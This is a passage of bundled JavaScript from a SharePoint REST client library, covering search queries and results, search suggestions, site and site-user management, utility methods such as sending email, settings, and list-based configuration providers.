len }); }; SearchQueryBuilder.prototype.maxSnippetLength = function (len) { return this.extendQuery({ MaxSnippetLength: len }); }; SearchQueryBuilder.prototype.summaryLength = function (len) { return this.extendQuery({ SummaryLength: len }); }; SearchQueryBuilder.prototype.toSearchQuery = function () { return this._query; }; SearchQueryBuilder.prototype.extendQuery = function (part) { this._query = util_1.Util.extend(this._query, part); return this; }; return SearchQueryBuilder; }()); exports.SearchQueryBuilder = SearchQueryBuilder; /** * Describes the search API * */ var Search = (function (_super) { __extends(Search, _super); /** * Creates a new instance of the Search class * * @param baseUrl The url for the search context * @param path Optional path override; defaults to "_api/search/postquery" */ function Search(baseUrl, path) { if (path === void 0) { path = "_api/search/postquery"; } return _super.call(this, baseUrl, path) || this; } /** * Executes the supplied query against the search service, formatting array properties for the REST request * * @param query The query to execute * @returns Promise */ Search.prototype.execute = function (query) { var _this = this; var formattedBody; formattedBody = query; if (formattedBody.SelectProperties) { formattedBody.SelectProperties = { results: query.SelectProperties }; } if (formattedBody.RefinementFilters) { formattedBody.RefinementFilters = { results: query.RefinementFilters }; } if (formattedBody.SortList) { formattedBody.SortList = { results: query.SortList }; } if (formattedBody.HithighlightedProperties) { formattedBody.HithighlightedProperties = { results: query.HithighlightedProperties }; } if (formattedBody.ReorderingRules) { formattedBody.ReorderingRules = { results: query.ReorderingRules }; } if (formattedBody.Properties) { formattedBody.Properties = { results: query.Properties }; } var postBody = JSON.stringify({ request: util_1.Util.extend({ "__metadata": { "type": "Microsoft.Office.Server.Search.REST.SearchRequest" }, }, formattedBody), }); return this.post({ body: postBody }).then(function (data) { return new SearchResults(data, _this.toUrl(), query); }); }; return Search; }(queryable_1.QueryableInstance)); exports.Search = Search; /** * Describes the SearchResults class, which returns the formatted and raw version of the query response */ var SearchResults = (function () { /** * Creates a new instance of the SearchResults class * */ function SearchResults(rawResponse, _url, _query, _raw, _primary) { if (_raw === void 0) { _raw = null; } if (_primary === void 0) { _primary = null; } this._url = _url; this._query = _query; this._raw = _raw; this._primary = _primary; this._raw = rawResponse.postquery ?
rawResponse.postquery : rawResponse; } Object.defineProperty(SearchResults.prototype, "ElapsedTime", { get: function () { return this.RawSearchResults.ElapsedTime; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "RowCount", { get: function () { return this.RawSearchResults.PrimaryQueryResult.RelevantResults.RowCount; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "TotalRows", { get: function () { return this.RawSearchResults.PrimaryQueryResult.RelevantResults.TotalRows; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "TotalRowsIncludingDuplicates", { get: function () { return this.RawSearchResults.PrimaryQueryResult.RelevantResults.TotalRowsIncludingDuplicates; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "RawSearchResults", { get: function () { return this._raw; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "PrimarySearchResults", { get: function () { if (this._primary === null) { this._primary = this.formatSearchResults(this._raw.PrimaryQueryResult.RelevantResults.Table.Rows); } return this._primary; }, enumerable: true, configurable: true }); /** * Gets a page of results * * @param pageNumber Index of the page to return. Used to determine StartRow * @param pageSize Optional, items per page (default = 10) */ SearchResults.prototype.getPage = function (pageNumber, pageSize) { // if we got all the available rows we don't have another page if (this.TotalRows < this.RowCount) { return Promise.resolve(null); } // if pageSize is supplied, then we use that regardless of any previous values // otherwise get the previous RowLimit or default to 10 var rows = typeof pageSize !== "undefined" ? pageSize : this._query.hasOwnProperty("RowLimit") ? this._query.RowLimit : 10; var query = util_1.Util.extend(this._query, { RowLimit: rows, StartRow: rows * (pageNumber - 1) + 1, }); // we have reached the end if (query.StartRow > this.TotalRows) { return Promise.resolve(null); } var search = new Search(this._url, null); return search.execute(query); }; /** * Formats a search results array * * @param rawResults The array to process */ SearchResults.prototype.formatSearchResults = function (rawResults) { var results = new Array(); var tempResults = rawResults.results ? rawResults.results : rawResults; for (var _i = 0, tempResults_1 = tempResults; _i < tempResults_1.length; _i++) { var tempResult = tempResults_1[_i]; var cells = tempResult.Cells.results ? 
tempResult.Cells.results : tempResult.Cells; results.push(cells.reduce(function (res, cell) { Object.defineProperty(res, cell.Key, { configurable: false, enumerable: false, value: cell.Value, writable: false, }); return res; }, {})); } return results; }; return SearchResults; }()); exports.SearchResults = SearchResults; /** * defines the SortDirection enum */ var SortDirection; (function (SortDirection) { SortDirection[SortDirection["Ascending"] = 0] = "Ascending"; SortDirection[SortDirection["Descending"] = 1] = "Descending"; SortDirection[SortDirection["FQLFormula"] = 2] = "FQLFormula"; })(SortDirection = exports.SortDirection || (exports.SortDirection = {})); /** * defines the ReorderingRuleMatchType enum */ var ReorderingRuleMatchType; (function (ReorderingRuleMatchType) { ReorderingRuleMatchType[ReorderingRuleMatchType["ResultContainsKeyword"] = 0] = "ResultContainsKeyword"; ReorderingRuleMatchType[ReorderingRuleMatchType["TitleContainsKeyword"] = 1] = "TitleContainsKeyword"; ReorderingRuleMatchType[ReorderingRuleMatchType["TitleMatchesKeyword"] = 2] = "TitleMatchesKeyword"; ReorderingRuleMatchType[ReorderingRuleMatchType["UrlStartsWith"] = 3] = "UrlStartsWith"; ReorderingRuleMatchType[ReorderingRuleMatchType["UrlExactlyMatches"] = 4] = "UrlExactlyMatches"; ReorderingRuleMatchType[ReorderingRuleMatchType["ContentTypeIs"] = 5] = "ContentTypeIs"; ReorderingRuleMatchType[ReorderingRuleMatchType["FileExtensionMatches"] = 6] = "FileExtensionMatches"; ReorderingRuleMatchType[ReorderingRuleMatchType["ResultHasTag"] = 7] = "ResultHasTag"; ReorderingRuleMatchType[ReorderingRuleMatchType["ManualCondition"] = 8] = "ManualCondition"; })(ReorderingRuleMatchType = exports.ReorderingRuleMatchType || (exports.ReorderingRuleMatchType = {})); /** * Specifies the type value for the property */ var QueryPropertyValueType; (function (QueryPropertyValueType) { QueryPropertyValueType[QueryPropertyValueType["None"] = 0] = "None"; QueryPropertyValueType[QueryPropertyValueType["StringType"] = 1] = "StringType"; QueryPropertyValueType[QueryPropertyValueType["Int32TYpe"] = 2] = "Int32TYpe"; QueryPropertyValueType[QueryPropertyValueType["BooleanType"] = 3] = "BooleanType"; QueryPropertyValueType[QueryPropertyValueType["StringArrayType"] = 4] = "StringArrayType"; QueryPropertyValueType[QueryPropertyValueType["UnSupportedType"] = 5] = "UnSupportedType"; })(QueryPropertyValueType = exports.QueryPropertyValueType || (exports.QueryPropertyValueType = {})); var SearchBuiltInSourceId = (function () { function SearchBuiltInSourceId() { } return SearchBuiltInSourceId; }()); SearchBuiltInSourceId.Documents = "e7ec8cee-ded8-43c9-beb5-436b54b31e84"; SearchBuiltInSourceId.ItemsMatchingContentType = "5dc9f503-801e-4ced-8a2c-5d1237132419"; SearchBuiltInSourceId.ItemsMatchingTag = "e1327b9c-2b8c-4b23-99c9-3730cb29c3f7"; SearchBuiltInSourceId.ItemsRelatedToCurrentUser = "48fec42e-4a92-48ce-8363-c2703a40e67d"; SearchBuiltInSourceId.ItemsWithSameKeywordAsThisItem = "5c069288-1d17-454a-8ac6-9c642a065f48"; SearchBuiltInSourceId.LocalPeopleResults = "b09a7990-05ea-4af9-81ef-edfab16c4e31"; SearchBuiltInSourceId.LocalReportsAndDataResults = "203fba36-2763-4060-9931-911ac8c0583b"; SearchBuiltInSourceId.LocalSharePointResults = "8413cd39-2156-4e00-b54d-11efd9abdb89"; SearchBuiltInSourceId.LocalVideoResults = "78b793ce-7956-4669-aa3b-451fc5defebf"; SearchBuiltInSourceId.Pages = "5e34578e-4d08-4edc-8bf3-002acf3cdbcc"; SearchBuiltInSourceId.Pictures = "38403c8c-3975-41a8-826e-717f2d41568a"; SearchBuiltInSourceId.Popular = 
"97c71db1-58ce-4891-8b64-585bc2326c12"; SearchBuiltInSourceId.RecentlyChangedItems = "ba63bbae-fa9c-42c0-b027-9a878f16557c"; SearchBuiltInSourceId.RecommendedItems = "ec675252-14fa-4fbe-84dd-8d098ed74181"; SearchBuiltInSourceId.Wiki = "9479bf85-e257-4318-b5a8-81a180f5faa1"; exports.SearchBuiltInSourceId = SearchBuiltInSourceId; /***/ }), /* 28 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var SearchSuggest = (function (_super) { __extends(SearchSuggest, _super); function SearchSuggest(baseUrl, path) { if (path === void 0) { path = "_api/search/suggest"; } return _super.call(this, baseUrl, path) || this; } SearchSuggest.prototype.execute = function (query) { this.mapQueryToQueryString(query); return this.get().then(function (response) { return new SearchSuggestResult(response); }); }; SearchSuggest.prototype.mapQueryToQueryString = function (query) { this.query.add("querytext", "'" + query.querytext + "'"); if (query.hasOwnProperty("count")) { this.query.add("inumberofquerysuggestions", query.count.toString()); } if (query.hasOwnProperty("personalCount")) { this.query.add("inumberofresultsuggestions", query.personalCount.toString()); } if (query.hasOwnProperty("preQuery")) { this.query.add("fprequerysuggestions", query.preQuery.toString()); } if (query.hasOwnProperty("hitHighlighting")) { this.query.add("fhithighlighting", query.hitHighlighting.toString()); } if (query.hasOwnProperty("capitalize")) { this.query.add("fcapitalizefirstletters", query.capitalize.toString()); } if (query.hasOwnProperty("culture")) { this.query.add("culture", query.culture.toString()); } if (query.hasOwnProperty("stemming")) { this.query.add("enablestemming", query.stemming.toString()); } if (query.hasOwnProperty("includePeople")) { this.query.add("showpeoplenamesuggestions", query.includePeople.toString()); } if (query.hasOwnProperty("queryRules")) { this.query.add("enablequeryrules", query.queryRules.toString()); } if (query.hasOwnProperty("prefixMatch")) { this.query.add("fprefixmatchallterms", query.prefixMatch.toString()); } }; return SearchSuggest; }(queryable_1.QueryableInstance)); exports.SearchSuggest = SearchSuggest; var SearchSuggestResult = (function () { function SearchSuggestResult(json) { if (json.hasOwnProperty("suggest")) { // verbose this.PeopleNames = json.suggest.PeopleNames.results; this.PersonalResults = json.suggest.PersonalResults.results; this.Queries = json.suggest.Queries.results; } else { this.PeopleNames = json.PeopleNames; this.PersonalResults = json.PersonalResults; this.Queries = json.Queries; } } return SearchSuggestResult; }()); exports.SearchSuggestResult = SearchSuggestResult; /***/ }), /* 29 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; 
}; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var webs_1 = __webpack_require__(8); var usercustomactions_1 = __webpack_require__(19); var odata_1 = __webpack_require__(2); var features_1 = __webpack_require__(23); /** * Describes a site collection * */ var Site = (function (_super) { __extends(Site, _super); /** * Creates a new instance of the Site class * * @param baseUrl The url or Queryable which forms the parent of this site collection */ function Site(baseUrl, path) { if (path === void 0) { path = "_api/site"; } return _super.call(this, baseUrl, path) || this; } Object.defineProperty(Site.prototype, "rootWeb", { /** * Gets the root web of the site collection * */ get: function () { return new webs_1.Web(this, "rootweb"); }, enumerable: true, configurable: true }); Object.defineProperty(Site.prototype, "features", { /** * Gets the active features for this site collection * */ get: function () { return new features_1.Features(this); }, enumerable: true, configurable: true }); Object.defineProperty(Site.prototype, "userCustomActions", { /** * Gets all custom actions for this site collection * */ get: function () { return new usercustomactions_1.UserCustomActions(this); }, enumerable: true, configurable: true }); /** * Gets the context information for this site collection */ Site.prototype.getContextInfo = function () { var q = new Site(this.parentUrl, "_api/contextinfo"); return q.post().then(function (data) { if (data.hasOwnProperty("GetContextWebInformation")) { var info = data.GetContextWebInformation; info.SupportedSchemaVersions = info.SupportedSchemaVersions.results; return info; } else { return data; } }); }; /** * Gets the document libraries on a site. Static method. 
(SharePoint Online only) * * @param absoluteWebUrl The absolute url of the web whose document libraries should be returned */ Site.prototype.getDocumentLibraries = function (absoluteWebUrl) { var q = new queryable_1.Queryable("", "_api/sp.web.getdocumentlibraries(@v)"); q.query.add("@v", "'" + absoluteWebUrl + "'"); return q.get().then(function (data) { if (data.hasOwnProperty("GetDocumentLibraries")) { return data.GetDocumentLibraries; } else { return data; } }); }; /** * Gets the site url from a page url * * @param absolutePageUrl The absolute url of the page */ Site.prototype.getWebUrlFromPageUrl = function (absolutePageUrl) { var q = new queryable_1.Queryable("", "_api/sp.web.getweburlfrompageurl(@v)"); q.query.add("@v", "'" + absolutePageUrl + "'"); return q.get().then(function (data) { if (data.hasOwnProperty("GetWebUrlFromPageUrl")) { return data.GetWebUrlFromPageUrl; } else { return data; } }); }; /** * Creates a new batch for requests within the context of this site collection * */ Site.prototype.createBatch = function () { return new odata_1.ODataBatch(this.parentUrl); }; /** * Opens a web by id (using POST) * * @param webId The GUID id of the web to open */ Site.prototype.openWebById = function (webId) { return this.clone(Site, "openWebById('" + webId + "')", true).post().then(function (d) { return { data: d, web: webs_1.Web.fromUrl(odata_1.extractOdataId(d)), }; }); }; return Site; }(queryable_1.QueryableInstance)); exports.Site = Site; /***/ }), /* 30 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var sitegroups_1 = __webpack_require__(18); var util_1 = __webpack_require__(0); /** * Describes a collection of all site collection users * */ var SiteUsers = (function (_super) { __extends(SiteUsers, _super); /** * Creates a new instance of the SiteUsers class * * @param baseUrl The url or Queryable which forms the parent of this user collection */ function SiteUsers(baseUrl, path) { if (path === void 0) { path = "siteusers"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a user from the collection by email * * @param email The email address of the user to retrieve */ SiteUsers.prototype.getByEmail = function (email) { return new SiteUser(this, "getByEmail('" + email + "')"); }; /** * Gets a user from the collection by id * * @param id The id of the user to retrieve */ SiteUsers.prototype.getById = function (id) { return new SiteUser(this, "getById(" + id + ")"); }; /** * Gets a user from the collection by login name * * @param loginName The login name of the user to retrieve */ SiteUsers.prototype.getByLoginName = function (loginName) { var su = new SiteUser(this); su.concat("(@v)"); su.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return su; }; /** * Removes a user from the collection by id * * @param id The id of the user to remove */ SiteUsers.prototype.removeById = function (id) { return this.clone(SiteUsers, "removeById(" + id + ")", true).post(); }; /** * Removes a user from the collection by login name * * @param loginName The login name of the user to remove */ SiteUsers.prototype.removeByLoginName = function (loginName) { var o = this.clone(SiteUsers, "removeByLoginName(@v)", true); o.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return o.post(); }; /** * Adds a user to a group * * @param loginName The login name of the user to add to the group * */ SiteUsers.prototype.add = function (loginName) { var _this = this; return this.clone(SiteUsers, null, true).post({ body: JSON.stringify({ "__metadata": { "type": "SP.User" }, LoginName: loginName }), }).then(function () { return _this.getByLoginName(loginName); }); }; return SiteUsers; }(queryable_1.QueryableCollection)); exports.SiteUsers = SiteUsers; /** * Describes a single user * */ var SiteUser = (function (_super) { __extends(SiteUser, _super); function SiteUser() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(SiteUser.prototype, "groups", { /** * Gets the groups for this user * */ get: function () { return new sitegroups_1.SiteGroups(this, "groups"); }, enumerable: true, configurable: true }); /** * Updates this user instance with the supplied properties * * @param properties A plain object of property names and values to update for the user */ SiteUser.prototype.update = function (properties) { var _this = this; var postBody = util_1.Util.extend({ "__metadata": { "type": "SP.User" } }, properties); return this.post({ body: JSON.stringify(postBody), headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, user: _this, }; }); }; /** * Delete this user * */ SiteUser.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return SiteUser; }(queryable_1.QueryableInstance)); exports.SiteUser = SiteUser; /** * Represents the current user */ var CurrentUser = (function (_super) { __extends(CurrentUser, 
_super); function CurrentUser(baseUrl, path) { if (path === void 0) { path = "currentuser"; } return _super.call(this, baseUrl, path) || this; } return CurrentUser; }(queryable_1.QueryableInstance)); exports.CurrentUser = CurrentUser; /***/ }), /* 31 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); var files_1 = __webpack_require__(7); var odata_1 = __webpack_require__(2); /** * Allows for calling of the static SP.Utilities.Utility methods by supplying the method name */ var UtilityMethod = (function (_super) { __extends(UtilityMethod, _super); /** * Creates a new instance of the Utility method class * * @param baseUrl The parent url provider * @param methodName The static method name to call on the utility class */ function UtilityMethod(baseUrl, methodName) { return _super.call(this, UtilityMethod.getBaseUrl(baseUrl), "_api/SP.Utilities.Utility." + methodName) || this; } UtilityMethod.getBaseUrl = function (candidate) { if (typeof candidate === "string") { return candidate; } var c = candidate; var url = c.toUrl(); var index = url.indexOf("_api/"); if (index < 0) { return url; } return url.substr(0, index); }; UtilityMethod.prototype.excute = function (props) { return this.postAs({ body: JSON.stringify(props), }); }; /** * Clones this queryable into a new queryable instance of T * @param factory Constructor used to create the new instance * @param additionalPath Any additional path to include in the clone * @param includeBatch If true this instance's batch will be added to the cloned instance */ UtilityMethod.prototype.create = function (methodName, includeBatch) { var clone = new UtilityMethod(this.parentUrl, methodName); var target = this.query.get("@target"); if (target !== null) { clone.query.add("@target", target); } if (includeBatch && this.hasBatch) { clone = clone.inBatch(this.batch); } return clone; }; /** * Sends an email based on the supplied properties * * @param props The properties of the email to send */ UtilityMethod.prototype.sendEmail = function (props) { var params = { properties: { Body: props.Body, From: props.From, Subject: props.Subject, "__metadata": { "type": "SP.Utilities.EmailProperties" }, }, }; if (props.To && props.To.length > 0) { params.properties = util_1.Util.extend(params.properties, { To: { results: props.To }, }); } if (props.CC && props.CC.length > 0) { params.properties = util_1.Util.extend(params.properties, { CC: { results: props.CC }, }); } if (props.BCC && props.BCC.length > 0) { params.properties = util_1.Util.extend(params.properties, { BCC: { results: props.BCC }, }); } if (props.AdditionalHeaders) { params.properties = util_1.Util.extend(params.properties, { AdditionalHeaders: props.AdditionalHeaders, }); } return this.create("SendEmail", true).excute(params); }; UtilityMethod.prototype.getCurrentUserEmailAddresses = function () { return this.create("GetCurrentUserEmailAddresses", true).excute({}); }; UtilityMethod.prototype.resolvePrincipal = 
function (input, scopes, sources, inputIsEmailOnly, addToUserInfoList, matchUserInfoList) { if (matchUserInfoList === void 0) { matchUserInfoList = false; } var params = { addToUserInfoList: addToUserInfoList, input: input, inputIsEmailOnly: inputIsEmailOnly, matchUserInfoList: matchUserInfoList, scopes: scopes, sources: sources, }; return this.create("ResolvePrincipalInCurrentContext", true).excute(params); }; UtilityMethod.prototype.searchPrincipals = function (input, scopes, sources, groupName, maxCount) { var params = { groupName: groupName, input: input, maxCount: maxCount, scopes: scopes, sources: sources, }; return this.create("SearchPrincipalsUsingContextWeb", true).excute(params); }; UtilityMethod.prototype.createEmailBodyForInvitation = function (pageAddress) { var params = { pageAddress: pageAddress, }; return this.create("CreateEmailBodyForInvitation", true).excute(params); }; UtilityMethod.prototype.expandGroupsToPrincipals = function (inputs, maxCount) { if (maxCount === void 0) { maxCount = 30; } var params = { inputs: inputs, maxCount: maxCount, }; return this.create("ExpandGroupsToPrincipals", true).excute(params); }; UtilityMethod.prototype.createWikiPage = function (info) { return this.create("CreateWikiPageInContextWeb", true).excute({ parameters: info, }).then(function (r) { return { data: r, file: new files_1.File(odata_1.extractOdataId(r)), }; }); }; return UtilityMethod; }(queryable_1.Queryable)); exports.UtilityMethod = UtilityMethod; /***/ }), /* 32 */ /***/ (function(module, exports) { var g; // This works in non-strict mode g = (function() { return this; })(); try { // This works if eval is allowed (see CSP) g = g || Function("return this")() || (1,eval)("this"); } catch(e) { // This works if the window reference is available if(typeof window === "object") g = window; } // g can still be undefined, but nothing to do about it... // We return undefined, instead of nothing here, so it's // easier to handle this case. 
// (e.g. so consumers can write: if (!global) { ... })
module.exports = g; /***/ }), /* 33 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var collections_1 = __webpack_require__(6); /** * Class used to manage the current application settings * */ var Settings = (function () { /** * Creates a new instance of the settings class * * @constructor */ function Settings() { this._settings = new collections_1.Dictionary(); } /** * Adds a new single setting, or overwrites a previous setting with the same key * * @param {string} key The key used to store this setting * @param {string} value The setting value to store */ Settings.prototype.add = function (key, value) { this._settings.add(key, value); }; /** * Adds a JSON value to the collection as a string; you must use getJSON to rehydrate the object when read * * @param {string} key The key used to store this setting * @param {any} value The setting value to store */ Settings.prototype.addJSON = function (key, value) { this._settings.add(key, JSON.stringify(value)); }; /** * Applies the supplied hash to the setting collection, overwriting any existing values or creating new ones * * @param {TypedHash<any>} hash The set of values to add */ Settings.prototype.apply = function (hash) { var _this = this; return new Promise(function (resolve, reject) { try { _this._settings.merge(hash); resolve(); } catch (e) { reject(e); } }); }; /** * Loads configuration settings into the collection from the supplied provider and returns a Promise * * @param {IConfigurationProvider} provider The provider from which we will load the settings */ Settings.prototype.load = function (provider) { var _this = this; return new Promise(function (resolve, reject) { provider.getConfiguration().then(function (value) { _this._settings.merge(value); resolve(); }).catch(function (reason) { reject(reason); }); }); }; /** * Gets a value from the configuration * * @param {string} key The key whose value we want to return. Returns null if the key does not exist * @return {string} string value from the configuration */ Settings.prototype.get = function (key) { return this._settings.get(key); }; /** * Gets a JSON value, rehydrating the stored string to the original object * * @param {string} key The key whose value we want to return.
Returns null if the key does not exist * @return {any} object from the configuration */ Settings.prototype.getJSON = function (key) { var o = this.get(key); if (typeof o === "undefined" || o === null) { return o; } return JSON.parse(o); }; return Settings; }()); exports.Settings = Settings; /***/ }), /* 34 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var search_1 = __webpack_require__(27); var searchsuggest_1 = __webpack_require__(28); var site_1 = __webpack_require__(29); var webs_1 = __webpack_require__(8); var util_1 = __webpack_require__(0); var userprofiles_1 = __webpack_require__(48); var exceptions_1 = __webpack_require__(3); var utilities_1 = __webpack_require__(31); /** * Root of the SharePoint REST module */ var SPRest = (function () { function SPRest() { } /** * Executes a search against this web context * * @param query The SearchQuery definition */ SPRest.prototype.searchSuggest = function (query) { var finalQuery; if (typeof query === "string") { finalQuery = { querytext: query }; } else { finalQuery = query; } return new searchsuggest_1.SearchSuggest("").execute(finalQuery); }; /** * Executes a search against this web context * * @param query The SearchQuery definition */ SPRest.prototype.search = function (query) { var finalQuery; if (typeof query === "string") { finalQuery = { Querytext: query }; } else if (query instanceof search_1.SearchQueryBuilder) { finalQuery = query.toSearchQuery(); } else { finalQuery = query; } return new search_1.Search("").execute(finalQuery); }; Object.defineProperty(SPRest.prototype, "site", { /** * Begins a site collection scoped REST request * */ get: function () { return new site_1.Site(""); }, enumerable: true, configurable: true }); Object.defineProperty(SPRest.prototype, "web", { /** * Begins a web scoped REST request * */ get: function () { return new webs_1.Web(""); }, enumerable: true, configurable: true }); Object.defineProperty(SPRest.prototype, "profiles", { /** * Access to user profile methods * */ get: function () { return new userprofiles_1.UserProfileQuery(""); }, enumerable: true, configurable: true }); /** * Creates a new batch object for use with the Queryable.addToBatch method * */ SPRest.prototype.createBatch = function () { return this.web.createBatch(); }; Object.defineProperty(SPRest.prototype, "utility", { /** * Static utilities methods from SP.Utilities.Utility */ get: function () { return new utilities_1.UtilityMethod("", ""); }, enumerable: true, configurable: true }); /** * Begins a cross-domain, host site scoped REST request, for use in add-in webs * * @param addInWebUrl The absolute url of the add-in web * @param hostWebUrl The absolute url of the host web */ SPRest.prototype.crossDomainSite = function (addInWebUrl, hostWebUrl) { return this._cdImpl(site_1.Site, addInWebUrl, hostWebUrl, "site"); }; /** * Begins a cross-domain, host web scoped REST request, for use in add-in webs * * @param addInWebUrl The absolute url of the add-in web * @param hostWebUrl The absolute url of the host web */ SPRest.prototype.crossDomainWeb = function (addInWebUrl, hostWebUrl) { return this._cdImpl(webs_1.Web, addInWebUrl, hostWebUrl, "web"); }; /** * Implements the creation of cross domain REST urls * * @param factory The constructor of the object to create Site | Web * @param addInWebUrl The absolute url of the add-in web * @param hostWebUrl The absolute url of the host web * @param urlPart String part to append to the url "site" | "web" */ 
SPRest.prototype._cdImpl = function (factory, addInWebUrl, hostWebUrl, urlPart) { if (!util_1.Util.isUrlAbsolute(addInWebUrl)) { throw new exceptions_1.UrlException("The addInWebUrl parameter must be an absolute url."); } if (!util_1.Util.isUrlAbsolute(hostWebUrl)) { throw new exceptions_1.UrlException("The hostWebUrl parameter must be an absolute url."); } var url = util_1.Util.combinePaths(addInWebUrl, "_api/SP.AppContextSite(@target)"); var instance = new factory(url, urlPart); instance.query.add("@target", "'" + encodeURIComponent(hostWebUrl) + "'"); return instance; }; return SPRest; }()); exports.SPRest = SPRest; /***/ }), /* 35 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); __export(__webpack_require__(44)); var httpclient_1 = __webpack_require__(15); exports.HttpClient = httpclient_1.HttpClient; var sprequestexecutorclient_1 = __webpack_require__(40); exports.SPRequestExecutorClient = sprequestexecutorclient_1.SPRequestExecutorClient; var nodefetchclient_1 = __webpack_require__(39); exports.NodeFetchClient = nodefetchclient_1.NodeFetchClient; var fetchclient_1 = __webpack_require__(21); exports.FetchClient = fetchclient_1.FetchClient; __export(__webpack_require__(36)); var collections_1 = __webpack_require__(6); exports.Dictionary = collections_1.Dictionary; var util_1 = __webpack_require__(0); exports.Util = util_1.Util; __export(__webpack_require__(5)); __export(__webpack_require__(3)); /***/ }), /* 36 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var cachingConfigurationProvider_1 = __webpack_require__(20); exports.CachingConfigurationProvider = cachingConfigurationProvider_1.default; var spListConfigurationProvider_1 = __webpack_require__(37); exports.SPListConfigurationProvider = spListConfigurationProvider_1.default; /***/ }), /* 37 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var cachingConfigurationProvider_1 = __webpack_require__(20); /** * A configuration provider which loads configuration values from a SharePoint list * */ var SPListConfigurationProvider = (function () { /** * Creates a new SharePoint list based configuration provider * @constructor * @param {string} webUrl Url of the SharePoint site, where the configuration list is located * @param {string} listTitle Title of the SharePoint list, which contains the configuration settings (optional, default = "config") */ function SPListConfigurationProvider(sourceWeb, sourceListTitle) { if (sourceListTitle === void 0) { sourceListTitle = "config"; } this.sourceWeb = sourceWeb; this.sourceListTitle = sourceListTitle; } Object.defineProperty(SPListConfigurationProvider.prototype, "web", { /** * Gets the url of the SharePoint site, where the configuration list is located * * @return {string} Url address of the site */ get: function () { return this.sourceWeb; }, enumerable: true, configurable: true }); Object.defineProperty(SPListConfigurationProvider.prototype, "listTitle", { /** * Gets the title of the SharePoint list, which contains the configuration settings * * @return {string} List title */ get: function () { return this.sourceListTitle; }, enumerable: true, configurable: true }); /** * Loads the configuration values from the SharePoint list * * @return 
{Promise<TypedHash<string>>} Promise of loaded configuration values */ SPListConfigurationProvider.prototype.getConfiguration = function () { return this.web.lists.getByTitle(this.listTitle).items.select("Title", "Value") .getAs().then(function (data) { return data.reduce(function (configuration, item) { return Object.defineProperty(configuration, item.Title, { configurable: false, enumerable: false, value: item.Value, writable: false, }); }, {}); }); }; /** * Wraps the current provider in a cache enabled provider * * @return {CachingConfigurationProvider} Caching providers which wraps the current provider */ SPListConfigurationProvider.prototype.asCaching = function () { var cacheKey = "splist_" + this.web.toUrl() + "+" + this.listTitle; return new cachingConfigurationProvider_1.default(this, cacheKey); }; return SPListConfigurationProvider; }()); exports.default = SPListConfigurationProvider; /***/ }), /* 38 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var collections_1 = __webpack_require__(6); var util_1 = __webpack_require__(0); var odata_1 = __webpack_require__(2); var CachedDigest = (function () { function CachedDigest() { } return CachedDigest; }()); exports.CachedDigest = CachedDigest; // allows for the caching of digests across all HttpClient's which each have their own DigestCache wrapper. var digests = new collections_1.Dictionary(); var DigestCache = (function () { function DigestCache(_httpClient, _digests) { if (_digests === void 0) { _digests = digests; } this._httpClient = _httpClient; this._digests = _digests; } DigestCache.prototype.getDigest = function (webUrl) { var _this = this; var cachedDigest = this._digests.get(webUrl); if (cachedDigest !== null) { var now = new Date(); if (now < cachedDigest.expiration) { return 